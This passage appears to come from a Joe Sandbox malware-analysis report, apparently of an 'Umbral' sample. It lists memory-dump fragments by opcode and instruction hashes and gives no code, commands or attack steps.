                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 15faabeb865673dcff9243e3daa9b92b9217bc6b420e55384cc35e80e64abbe3
                                        • Instruction ID: 2a0653a4fbfbf3793b8f6b516e45d3bdbd62fd68e16690eb27861c9b4ecd5d04
                                        • Opcode Fuzzy Hash: 15faabeb865673dcff9243e3daa9b92b9217bc6b420e55384cc35e80e64abbe3
                                        • Instruction Fuzzy Hash: 59B01233A8A0194DDA10508474010FDF320F7801B6F500133CB0DC20004713102651C0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0eae9b0286c16d23a9ed2c9c20d00e4a34ec48259d0caf6326cfd71676d81c9b
                                        • Instruction ID: 7040a7e6e019022ed6a7a52b5e3b6827d4dafe824493d33f522f5b1ebf3b4dfa
                                        • Opcode Fuzzy Hash: 0eae9b0286c16d23a9ed2c9c20d00e4a34ec48259d0caf6326cfd71676d81c9b
                                        • Instruction Fuzzy Hash: 80B01237A49409489A2020C474010FDF314E78017AF500133C30D820008612102541C0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b73656ccb9c54c143f8768e1a37ddcdd8abbef968b3860c30b144a21026c9be7
                                        • Instruction ID: 283df5c111b268c50c06330a3ea02dba0955db8f0318f8ebf3041b754d2fb447
                                        • Opcode Fuzzy Hash: b73656ccb9c54c143f8768e1a37ddcdd8abbef968b3860c30b144a21026c9be7
                                        • Instruction Fuzzy Hash: 4CA0223288808C8BCF2088003C020FC3300FB00200F000022EC0E02000BB32A2380080
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab954bb0bd92b9b8a5e1034cf0854c2b9a800f4e61f6e08773f72b7c0c55a71b
                                        • Instruction ID: d0bd5e3c221a774d420060c697ca70a1756a3f141e38dc10adbbed3f2f6eeb6c
                                        • Opcode Fuzzy Hash: ab954bb0bd92b9b8a5e1034cf0854c2b9a800f4e61f6e08773f72b7c0c55a71b
                                        • Instruction Fuzzy Hash:
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 69037323fc0170473b5db771aa43c0fc2a997add340dc4d5fa1c785acc96745e
                                        • Instruction ID: ae3ec369919cf444501e57caef6660bdae0ec521959d44ee71b1b055d2fd4d56
                                        • Opcode Fuzzy Hash: 69037323fc0170473b5db771aa43c0fc2a997add340dc4d5fa1c785acc96745e
                                        • Instruction Fuzzy Hash:
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 503cef32d39dd246bdcebc15c23829a7424f09cb9f96541707826c907b24f770
                                        • Instruction ID: d1b05f6eeb43f747f4395bf151dedb90c1d5b068ce2b1d0c2d3d823951485202
                                        • Opcode Fuzzy Hash: 503cef32d39dd246bdcebc15c23829a7424f09cb9f96541707826c907b24f770
                                        • Instruction Fuzzy Hash: